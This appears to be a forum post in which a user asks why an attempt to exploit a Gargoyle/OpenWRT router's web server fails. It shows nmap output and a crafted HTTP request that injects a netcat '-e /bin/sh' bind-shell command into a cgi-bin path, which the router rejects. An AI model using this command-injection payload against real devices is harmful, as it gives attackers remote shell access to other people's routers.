I am still having a few problems here is what I have tried. Let me know if you see something I am doing wrong....
I tried this but it hangs up at [*] Starting the payload handler...
http://pauldotcom.com/2009/07/using-metasp...wrt-exploi.html
Also I tried this
compy:~ user$ nmap 192.168.1.1
Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds
interesting ports on 192.168.1.1:
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
443/tcp open http
compy:~ user$ nmap 192.168.1.1 -p 5555
Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-27 19:34 EDT
Interesting ports on 192.168.1.1:
PORT STATE SERVICE
5555/tcp closed freeciv
compy:~ user$ nano test
GET/cgi-bin/;nc$IFS\5555$IFS-e$IFS/bin/sh HTTP/1.0 host:192.168.1.1
compy:~ user$ cat test | nc 192.168.1.1 80
HTTP/1.0 400 Bad Request
Server: httpd_gargoyle/1.0 14mar2008
Date: Sat, 01 Jan 2000 01:50:56 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=%s
Connection: close
<HTML>
<HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>400 Bad Request</H4>
Bad filename.
<HR>
<ADDRESS><A HREF="http://www.gargoyle-router.com">httpd_gargoyle/1.0 14mar2008</A></ADDRESS>
</BODY>
</HTML>
compy:~ user$ nmap 192.168.1.1 -p 5555
Starting Nmap 5.00 ( http://nmap.org ) at 2009-07-27 19:34 EDT
Interesting ports on 192.168.1.1:
PORT STATE SERVICE
5555/tcp closed freeciv